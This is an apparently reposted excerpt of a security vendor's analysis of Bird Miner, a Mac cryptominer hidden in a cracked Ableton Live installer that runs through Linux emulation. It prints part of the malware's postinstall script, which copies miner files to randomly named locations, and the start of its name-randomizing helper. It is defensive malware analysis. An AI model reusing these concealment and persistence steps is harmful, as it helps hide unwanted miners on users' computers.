A new Mac cryptocurrency miner Malwarebytes detects as Bird Miner has been found in a cracked installer for the high-end music production software Ableton Live. The software is used as an instrument for live performances by DJs, as well as a tool for composing, recording, mixing, and mastering. And while cryptomining is not new on Mac, this one has a unique twist: It runs via Linux emulation.
Miner behavior
The Ableton Live 10 cracked installer can be downloaded from a piracy website called VST Crack, and it’s more than 2.6 GB; a size that might be cause for alarm on other programs, but reasonable for such an app. However, on closer inspection, it’s clear this installer is doing some strange things. For example, Bird Miner’s postinstall script will, among other things, copy some installed files to new locations with randomized names:
#RANDOM
z1="$( /Users/Shared/randwd Software )" z11="$( /Users/Shared/randwd )" z111="$( /Users/Shared/randwd )" z1111="$( /Users/Shared/randwd )" z2="$( /Users/Shared/randwd Software )"
z22="$( /Users/Shared/randwd )"
z222="$( /Users/Shared/randwd )"
z2222="$( /Users/Shared/randwd )" z3="$( /Users/Shared/randwd )"
z33="$( /Users/Shared/randwd )"
z3333="$( /Users/Shared/randwd )" #CREATE DIRECTORIES
mkdir /Library/Application Support/$z1
mkdir /Library/Application Support/$z2 #Move Programs
cp /Users/Shared/z1 /usr/local/bin/$z1
cp /Users/Shared/z1.daemon /Library/Application Support/$z1/$z11
cp /Users/Shared/z1.qcow2 /Library/Application Support/$z1/$z111 cp /Users/Shared/z1 /usr/local/bin/$z2
cp /Users/Shared/z1.daemon /Library/Application Support/$z2/$z22
cp /Users/Shared/z1.qcow2 /Library/Application Support/$z2/$z222
This code uses a randwd script, placed during the install process, to generate random names from a wordlist:
WORDLIST='/usr/share/dict/web2'
TMP_FILE=$(mktemp -t wordlist) [...] # Allows user to pass i ..
Support the originator by clicking the read the rest link below.
